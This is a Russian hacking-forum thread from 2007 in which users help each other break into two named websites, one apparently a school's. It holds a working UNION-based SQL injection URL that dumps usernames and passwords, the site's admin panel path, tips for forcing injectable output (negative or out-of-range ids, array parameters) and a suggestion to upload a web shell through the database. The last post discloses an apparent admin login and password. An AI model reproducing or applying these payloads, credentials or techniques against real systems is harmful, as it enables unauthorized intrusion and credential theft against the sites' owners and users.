HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу хелп со скулем
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

хелп со скулем
  #1  
Старый 29.08.2007, 03:14
bulbazaur
Участник форума
Регистрация: 10.09.2006
Сообщений: 160
С нами: 10350546

Репутация: 96
По умолчанию хелп со скулем
так, во первых, скажите мне, пожалуйста, где здесь одминка? :http://sofs.ru

во-вторых:
http://gym1517.ru/download.php?key=1+order+by+4
делаю юнион+1,2,3,4 - ошибка все равно вылезает
http://gym1517.ru/index.php?page=online&msg=18+order+by+7
делаю юнион - ни одного поля.
что делать? xD
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 29.08.2007, 03:20
n0ne
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
С нами: 10188506

Репутация: 861


По умолчанию
Цитата:
http://gym1517.ru/index.php?page=online&msg=18+and(1=2)+union+select +1,concat(username,0x3a,passwd),3,4,5,6,7+from+use r/*
Цитата:
http://gym1517.ru/admin/
наслаждайся

На http://sofs.ru нашел только phpMyAdmin:

Цитата:
http://sofs.ru/phpMyAdmin/
, что логично))

Ну если прав хватит на mysql.user (если у тебя там скуля) то через БД зальешь шелл

З.Ы. на будущее: Если поля сами по себе не появились, нужно сделать ошибку в синтаксисе запроса, как например здесь 1=2, ведь 1 не равно 2? Или просто минус поставить, т.е. msg=-18 или msg[]=18 (иногда прокатывает), или msg=999999999999999, т.е. число, которого нет в БД. Ну вообщем понятно)
Последний раз редактировалось n0ne; 29.08.2007 в 03:26..
 
Ответить с цитированием

  #3  
Старый 29.08.2007, 12:49
bulbazaur
Участник форума
Регистрация: 10.09.2006
Сообщений: 160
С нами: 10350546

Репутация: 96
По умолчанию
Цитата:
Сообщение от n0ne  
наслаждайся

На http://sofs.ru нашел только phpMyAdmin:

, что логично))
я тож нашел, но юзвер и пасс не подходят туда.
Цитата:
З.Ы. на будущее: Если поля сами по себе не появились, нужно сделать ошибку в синтаксисе запроса, как например здесь 1=2, ведь 1 не равно 2? Или просто минус поставить, т.е. msg=-18 или msg[]=18 (иногда прокатывает), или msg=999999999999999, т.е. число, которого нет в БД. Ну вообщем понятно)
тут фишка-то в том, что отчеты об ошибках отключены. линк, который ты мне дал - пустая страница... а вообще спасибо
 
Ответить с цитированием

  #4  
Старый 29.08.2007, 16:40
n0ne
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
С нами: 10188506

Репутация: 861


По умолчанию
Ты бы пробелы убрал, хекер)

Цитата:
admin507:gym1517admin
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Есть ли уязвимости на этом форуме? kju Freelance - О Работе 4 25.07.2006 18:22
НАРОД пожалуйсто ХЕЛП... d0Ck Болталка 8 25.12.2004 15:00



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка

Загрузка чата...